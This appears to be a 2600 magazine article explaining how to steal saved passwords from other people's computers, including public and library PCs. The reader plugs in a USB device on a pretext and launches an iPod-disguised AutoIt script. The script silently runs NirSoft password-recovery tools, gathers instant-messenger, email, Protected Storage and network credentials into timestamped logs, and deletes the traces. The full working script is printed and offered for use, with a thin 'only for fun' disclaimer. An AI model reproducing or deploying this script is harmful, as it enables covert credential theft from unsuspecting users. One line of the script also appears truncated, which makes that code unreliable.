iPod Sneakiness

by Rob

"My iPod's dying.  Mind if I plug it into your PC for a second to charge up?"

With those simple words, you can have some serious fun.  You need only two things: a MP3 player that functions as an USB device and a little knowledge of a scripting language.  I use AutoIt.

Here's what to do: Grab a couple of programs from nirsoft.net.  These were reviewed in 2600 earlier this year.

The ones I use are:

MessenPass  (www.nirsoft.net/utils/mspass.html) - Recovers the passwords of instant messenger programs like Yahoo! Messenger, MSN Messenger, Trillian, and more.

Mail PassView  (www.nirsoft.net/utils/mailpv.html) - Recovers the passwords of popular email clients like Outlook Express, Outlook, Eudora, Mozilla Thunderbird, and more.

Protected Storage PassView  (www.nirsoft.net/utils/pspv.html) - Displays all passwords and AutoComplete strings stored in your Protected Storage.

Network Password Recovery  (www.nirsoft.net/utils/network_password_recovery.html) - Freeware utility that recovers the network passwords stored by Windows XP.

There is also a key finder and a history browser, if that's your thing.  Put all of those programs into a folder on your MP3 player/USB device and get scripting.  The script I wrote runs all four programs silently, dumps the results to textfiles on the USB drive, creates one master text file with a name correlating to the date time stamp of when I ran it, then deletes the extraneous files.  I use the timestamp as a name.  That way I can run it multiple times on different PCs without having to move files.

With AutoIt, I compiled the script to an EXE and assigned it an iPod icon.  You can use any icon you think would be non-obvious.  It's silent, opens no windows, and takes about four seconds to run.

Run this on a public PC, at your computer lab, or at your library and you will be amazed at the amount of passwords and stored information you come away with.

Now I should warn you, this is only for fun, only to laugh at people who save their info on public PCs, not for hacking or anything malicious.

Enjoy.

The script follows:

Run(@ComSpec & ' /k "..\\Password\\Software\\pspv.exe /stext..\\Password\\new\\pspv.txt"', @ScriptDir, @SW_HIDE)
sleep(200)

Run(@ComSpec & ' /k "..\\Password\\Software\\im.exe /stext..\\Password\\new\\im.txt"', @ScriptDir, @SW_HIDE)
sleep(200)

Run(@ComSpec & ' /k "..\\Password\\Software\\mail.exe /stext..\\Password\\new\\mail.txt"', @ScriptDir, @SW_HIDE)
sleep(200)

Run(@ComSpec & ' /k "..\\Password\\Software\\network.exe /stext..\\Password\\new\\network.txt"', @ScriptDir, @SW_HIDE)
sleep(3000)

Run(@ComSpec & ' /k "COPY..\\Password\\new\\*.txt ..\\Password\\new\\all.txt"',
sleep(3000)

Dim $DateTime = @YEAR & "-" & @MON & "-" & @MDAY & " " & @HOUR & "-" & @MIN & "-" & @SEC
Dim $Location = @WorkingDir & '\\new\\'
Dim $Filename = "all.txt"
FileMove($Location & $Filename , $Location & $DateTime & ".log",1)
sleep(3000)

Run(@ComSpec & ' /k "del ..\\Password\\new\\*.txt"', @ScriptDir, @SW_HIDE)
sleep(1000)

Code: ipod-sneakiness.au3

Return to $2600 Index